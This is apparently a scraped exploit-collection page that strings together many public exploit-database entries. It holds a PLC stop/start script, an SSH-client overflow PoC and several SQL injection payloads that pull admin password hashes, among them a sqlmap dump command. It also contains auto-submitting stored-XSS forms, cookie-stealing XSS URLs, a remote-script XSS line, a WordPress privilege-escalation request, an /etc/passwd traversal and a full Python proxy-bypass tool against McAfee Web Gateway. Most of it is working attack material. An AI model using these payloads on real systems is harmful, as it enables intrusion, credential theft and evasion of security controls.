send_and_recv(s,1000,packet1).encode('hex') if ret[48:50] == '03': state = 'Running' elif ret[48:50] == '07': state = 'Stop' elif ret[48:50] == '00': state = 'On' else: print 'State unknown, found code: '+ret.encode('hex')[48:50] print 'Current PLC state: '+state ## Maintaining the LOOP if i == 50: break # ''' if i == 30: if state == 'Running': stopme = 1 else: startme = 1 #''' raw_input('All done, press [Enter] to exit')
HireHackking

ZOC SSH Client - Buffer Overflow (SEH) (PoC)

HACKER · %s · %s

""" # Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH) # Date: 20-5-2015 # Vendor homepage: www.emtec.com # Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html # Author: Dolev Farhi # Details: # -------- # Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the # server address and attempt to connect. """ #!/usr/bin/python filename="zoc.txt" buffer = "\x41" * 97 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
HireHackking

Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52970/info Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Matterdaddy Market 1.1 is vulnerable; other versions may also be affected. http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory
HireHackking
source: https://www.securityfocus.com/bid/52983/info BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. BGS CMS 2.2.1 is vulnerable; other versions may also be affected. <html> <title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title> <body bgcolor="#000000"> <script type="text/javascript"> function xss0(){document.forms["xss0"].submit();} function xss1(){document.forms["xss1"].submit();} function xss2(){document.forms["xss2"].submit();} function xss3(){document.forms["xss3"].submit();} function xss4(){document.forms["xss4"].submit();} function xss5(){document.forms["xss5"].submit();} function xss6(){document.forms["xss6"].submit();} function xss7(){document.forms["xss7"].submit();} </script> <form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0"> <input type="hidden" name="name" value="Zero Science Lab" /> <input type="hidden" name="title" value="XSS" /> <input type="hidden" name="description" value="Cross Site Scripting" /> <input type="hidden" name="parent_id" value="15" /> <input type="hidden" name="redirect" value='"><script>alert(1);</script>' /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="categories" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="29" /> </form> <form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1"> <input type="hidden" name="title" value="Zero Science Lab" /> <input type="hidden" name="description" value='"><script>alert(1);</script>' /> <input type="hidden" name="disp_on_full_view" value="1" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="level" value="0" /> <input type="hidden" name="type" value="ads" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="ads" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="0" /> </form> <form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2"> <input type="hidden" name="created" value="ZSL" /> <input type="hidden" name="name" value='"><script>alert(1);</script>' /> <input type="hidden" name="email" value="test@test.mk" /> <input type="hidden" name="message" value="t00t" /> <input type="hidden" name="status" value="coolio" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="orders" /> <input type="hidden" name="action" value="edit" /> </form> <form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3"> <input type="hidden" name="name" value='"><script>alert(1);</script>' /> <input type="hidden" name="question" value="What is physics?" /> <input type="hidden" name="start" value="10 2012" /> <input type="hidden" name="end" value="18 2012" /> <input type="hidden" name="answer_text[]" value="A warm summer evening." /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="polls" /> <input type="hidden" name="action" value="edit" /> </form> <form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4"> <input type="hidden" name="name" value="admin" /> <input type="hidden" name="image" value="joxy.jpg" /> <input type="hidden" name="url" value='"><script>alert(1);</script>' /> <input type="hidden" name="max_displays" value="1" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="banners" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="9" /> </form> <form action="http://www.example.com/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5"> <input type="hidden" name="title" value='"><script>alert(1);</script>' /> <input type="hidden" name="description" value="Ban" /> <input type="hidden" name="folder" value="sexy_banner_imgx" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="gallery" /> <input type="hidden" name="action" value="edit" /> </form> <form action="http://www.example.com/" method="GET" id="xss6"> <input type="hidden" name="action" value="search" /> <input type="hidden" name="search" value='"><script>alert(1);</script>' /> <input type="hidden" name="x" value="0" /> <input type="hidden" name="y" value="0" /> </form> <form action="http://www.example.com/cms/" method="GET" id="xss7"> <input type="hidden" name="section" value='"><script>alert(1);</script>' /> <input type="hidden" name="action" value="add_news" /> </form> <br /><br /> <a href="javascript: xss0();" style="text-decoration:none"> <b><font color="red"><h3>XSS 0</h3></font></b></a><br /> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><h3>XSS 1</h3></font></b></a><br /> <a href="javascript: xss2();" style="text-decoration:none"> <b><font color="red"><h3>XSS 2</h3></font></b></a><br /> <a href="javascript: xss3();" style="text-decoration:none"> <b><font color="red"><h3>XSS 3</h3></font></b></a><br /> <a href="javascript: xss4();" style="text-decoration:none"> <b><font color="red"><h3>XSS 4</h3></font></b></a><br /> <a href="javascript: xss5();" style="text-decoration:none"> <b><font color="red"><h3>XSS 5</h3></font></b></a><br /> <a href="javascript: xss6();" style="text-decoration:none"> <b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br /> <a href="javascript: xss7();" style="text-decoration:none"> <b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br /> </body></html>
HireHackking

WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities] # Date: 2015/05/19 # Exploit Author: Panagiotis Vagenas # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # Category: webapps ======================================== * 1. Privilege escalation ======================================== 1.1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website. 1.2 Proof of Concept * Login as regular user * Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 1.3 Actions taken after discovery Vendor was informed on 2015/05/19. 1.4 Solution No official solution yet exists. ======================================== * 2. Stored XSS ======================================== 2.1 Description All input fields from registered users aren't properly escaped. This could lead to an XSS attack that could possibly affect all visitors of the website, including administators. 2.2 Proof of Concept * Login as regular user * Update any field of your profile appending at the end `<script>alert('XSS');</script>` or `<script src=”http://malicious .server/my_malicious_script.js”/>` 2.3 Actions taken after discovery Vendor was informed on 2015/05/19. 2.4 Solution No official solution yet exists. ======================================== * 3. Unauthorized post publish and stored XSS ======================================== 3.1 Description Registered users can publish a post without administrator confirmation. Normally all posts submitted by users registered with WP Membership plugin are stored with the status `pending`. A malicious user though can publish his post by crafting the form is used for submission. 3.2 Proof of Concept * Login as regular user whom belongs to a group that can submit new posts * Visit the `New Post` section at your profile * Change field `post_status`: <select id="post_status" class="form-control" name="post_status"> <option value="publish" selected=”selected”>Pending Review</option> <option value="draft">Draft</option> </select> The post gets immediately published after you submit the form and is visible to all visitors of the website. In addition a stored XSS attack can be performed due to insufficient escaping of the post content input. 3.3 Actions taken after discovery Vendor was informed on 2015/05/19. 3.4 Solution No official solution yet exists. 3.5 Workaround Prevent users from submitting new posts through the relative option in plugin's settings
HireHackking
source: https://www.securityfocus.com/bid/52986/info All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php?msg=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E
HireHackking

Forma LMS 1.3 - Multiple SQL Injections

HACKER · %s · %s

Forma LMS 1.3 Multiple SQL Injections [+] Author: Filippo Roncari [+] Target: Forma LMS [+] Version: 1.3 and probably lower [+] Vendor: http://www.formalms.org [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf [+] Info: f.roncari@securenetwork.it / f@unsec.it [+] Summary Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more. [+] Vulnerability Details Forma LMS 1.3 is prone to multiple SQL injections vulnerabilities, which allow unprivileged users to inject arbitrary SQL statements. An attacker could exploit these vulnerabilities by sending crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other attacks depending on the DBMS’s user privileges. [+] Technical Details See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for technical details and source code. [+] Proof of Concept (PoC) Unprivileged users such as Student or Professors could exploit these issues. In reported payload "idst" SQL param is equal to 11836 which was admin's ID in tested installation. [!] coursereport.php SQL Injection in title param ------------------------- POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1 Host: localhost Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885 authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&source_of=scoitem&title=null+union+select+pass+fr om+core_user+where+idst=11836+&filtra=Salva+modifiche ------------------------- [!] lib.message.php Blind Time-Based SQL Injection in msg_course_filter param ------------------------- POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost Cookie: docebo_session=0c0491bb1fa6d814752d9e59c066df60 [...] ------WebKitFormBoundaryu0DCt6tLZt8hAdlH Content-Disposition: form-data; name="msg_course_filter" 99999 union SELECT IF(SUBSTRING(pass,1,1) = char(100),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836 [...] ------------------------ [!] coursereport.php SQL Injection in id_source param ------------------------- POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1 Host: localhost Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885; SQLiteManager_currentLangue=2 authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&weight=123&show_to_user=true&use_for_final=true&tit le=&source_of=scoitem&titolo=&id_source=null+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,p ass,null,null,null+from+core_user+where+idst=11836&save=Salva+modifiche ------------------------- For further details and explanations check the full advisory. [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
HireHackking

McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53015/info McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules. A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks. McAfee Web Gateway 7 is vulnerable; other versions may also be affected. import socket,struct,sys,time from threading import Thread #The timeOut can be changed if the proxy is slow. #Tested in GMail, Facebook, Youtube and several blocked sites. #The proxy get the Host field of the http header and do not verify anything else. #It trusts on the HTTP Header and it can be modified by the attacker. timeOut = 0.8 isGet = 0 hostNameG = "" pacoteGet = "" port = 8080 #Listening port proxyAddr = "vulnerableProxy.com" #vulnerable proxy proxyPort = 8080 # proxy port def handle(client,globalSock): client.settimeout(timeOut) global hostNameG while 1: dados = "" tam = 0 while 1: try: dados2 = client.recv(1024) tam = tam + len(dados2) dados = dados + dados2 except socket.timeout: break dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD if dd != -1: dd2 = dados.find(":") hostName = dados[dd+8:dd2] ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain pacote = dados hostHeader = "Host: " + hostName pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy pacote = pacote.replace(hostName, ipAddr) #changind domain for ip dados = pacote getd = dados.find("GET ") getd2 = dados.find("//") getd3 = dados.find("/", getd2+2) hostName = dados[getd2+2:getd3] if getd != -1: globalSock.close() globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) globalSock.connect((proxyAddr,proxyPort)) globalSock.settimeout(timeOut) getd2 = dados.find("//") getd3 = dados.find("/", getd2+2) hostName = dados[getd2+2:getd3] proxyAuth = "" proxyAuthN = dados.find("Proxy-Authorization:") if proxyAuthN != -1: proxyAuthNN = dados.find("\r\n", proxyAuthN) proxyAuth = dados[proxyAuthN:proxyAuthNN] ipAddr = socket.gethostbyname(hostName) info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n" if proxyAuthN != -1: info += proxyAuth + "\r\n" info += "Host: www.uol.com.br\r\n\r\n" globalSock.send(info) tam = 0 gdata = "" while 1: try: gdata2 = globalSock.recv(1024) tam = tam + len(gdata2) gdata = gdata + gdata2 if len(gdata2) == 0: break except socket.timeout: break globalSock.send(dados) tam = 0 gdata = "" while 1: try: gdata2 = globalSock.recv(1024) if len(gdata2) > 0: client.send(gdata2) tam = tam + len(gdata2) gdata = gdata + gdata2 if len(gdata2) == 0: break except socket.timeout: break print 'Proxy Bypass' print 'by Gabriel Menezes Nunes' print 'Tested on McAfee Web Gateway 7 and Squid Proxy' sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Attacked Proxy:', print proxyAddr print 'Listening on', print port sockzao.bind(("",port)) sockzao.listen(6) while 1: print 'Waiting for connections' client, address = sockzao.accept() print 'Client Connected' print address globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) globalSock.connect((proxyAddr,proxyPort)) globalSock.settimeout(timeOut) t = Thread(target=handle, args=(client,globalSock,)) t.start()
HireHackking

Seditio CMS 165 - 'plug.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53036/info Seditio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Seditio CMS 165 is vulnerable; prior versions may also be affected. $exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit. $first=$targetsite & '/forums.php'; // our 1'st request will go here. HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit. Sleep(1500); //sleeping 1.5 second (*Waiting operation*) HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun. InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service. Exit; //exit from exploit
HireHackking
source: https://www.securityfocus.com/bid/53030/info Joomla! Beatz Plugin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1 http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
HireHackking

Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation

HACKER · %s · %s

Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872) Jeremy Brown [jbrown3264/gmail] -Synopsis- Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall and Comodo Internet Security, runs a passwordless, background VNC server and listens for incoming connections. This can allow for at least local privilege escalation on several platforms. It also may be remotely exploitable via CSRF-like attacks utilizing a modified web-based VNC client (eg. a Java VNC client). -Repro- 1) Install GeekBuddy (either standalone or bundled with the aforementioned packages) 2) Administrator (or other user) logs into the system so the VNC server will be started 3) Start another login to the system (eg. target OS is Windows Server) 4) Connect to the VNC server on localhost to assume the Admin session -Fix- Comodo says they have fix this vulnerability with the v4.18.121 release in October 2014 -References- https://technet.microsoft.com/en-US/dn613815 http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf
HireHackking

WordPress Plugin FeedWordPress 2015.0426 - SQL Injection

HACKER · %s · %s

# Exploit Title: SQLi in FeedWordPress WordPress plugin # Date: 2015-05-19 # Exploit Author: Adrián M. F. # Vendor Homepage: https://wordpress.org/plugins/feedwordpress/ # Vulnerable version: 2015.0426 # Fixed version: 2015.0514 # CVE : CVE-2015-4018 (1) Authenticated SQLi [CWE-89] ------------------------------- * CODE: feedwordpresssyndicationpage.class.php:89 +++++++++++++++++++++++++++++++++++++++++ $targets = $wpdb->get_results(" SELECT * FROM $wpdb->links WHERE link_id IN (".implode(",",$_POST['link_ids']).") "); +++++++++++++++++++++++++++++++++++++++++ http://192.168.167.131/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php POST DATA: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1[SQLi] * POC: SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py -u "http://[domain]/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=Y" --data="_wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1" -p "link_ids[]" --dbms mysql --cookie="[cookie]" [............] POST parameter 'link_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 62 HTTP(s) requests: --- Parameter: link_ids[] (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) AND (SELECT * FROM (SELECT(SLEEP(5)))eHWc) AND (7794=7794 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x70716153577975544373,0x7178716271)-- --- [10:40:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++ Timeline ======== 2015-05-09: Discovered vulnerability. 2015-05-14: Vendor notification. 2015-05-14: Vendor response and fix. 2015-05-19: Public disclosure.
HireHackking
source: https://www.securityfocus.com/bid/52944/info Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected. http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
HireHackking

CitrusDB 2.4.1 - Local File Inclusion / SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52946/info CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability. An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver. CitrusDB 2.4.1 is vulnerable; other versions may also be affected. http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base
HireHackking
source: https://www.securityfocus.com/bid/52986/info All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/52986/info All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php?button_value= %22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/52986/info All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. All-in-One Event Calendar 1.4 is vulnerable; other prior versions may also be affected. http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22 %3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget ]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3E alert%28document.cookie%29;%3C/script%3E http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before _title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_ title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking

WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection

HACKER · %s · %s

======================================================================= title: SQL Injection product: WordPress WP Symposium Plugin vulnerable version: 15.1 (and probably below) fixed version: 15.4 CVE number: CVE-2015-3325 impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/wp-symposium/ found: 2015-02-07 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy." Source: https://wordpress.org/plugins/wp-symposium/ Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a blind sql injection attack can be performed within the forum feature to obtain sensitive information from the database. The vulnerable code sections are described below. forum.php lines 59-62: =============================================================================== if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) { $cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0; $topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE } =============================================================================== forum.php lines 95-103: =============================================================================== if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) { if ($topic_id == 0) { $forum = __wps__getForum($cat_id); if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3); $html .= $forum; } else { $html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER } } =============================================================================== functions.php lines 152-155: =============================================================================== $post = $wpdb->get_row(" SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY =============================================================================== Proof of concept: ----------------- The following HTTP request to the forum page returns the topic with id 1: =============================================================================== http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1 =============================================================================== The following HTTP request to the forum page returns a blank page, thus confirming the blind SQL injection vulnerability: =============================================================================== http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0 =============================================================================== Obtaining users and password hashes with sqlmap may look as follows: ================================================================================ sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users" ================================================================================ Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-13: Mail from author, confirming the vulnerability. 2015-04-14: Requesting CVE via post to the open source software security mailing list: http://openwall.com/lists/oss-security/2015/04/14/5 2015-04-15: Mail from author, stating that updated plugin version will be available in the next few days. 2015-05-05: Mail from author, stating that fixed version has been uploaded and should be available soon. 2015-05-07: Confirming that update is available, releasing security advisory Solution: --------- Update to the most recent plugin version. Workaround: ----------- See solution.
HireHackking

Bioly 1.3 - '/index.php' Cross-Site Scripting / SQL Injection

HACKER · %s · %s

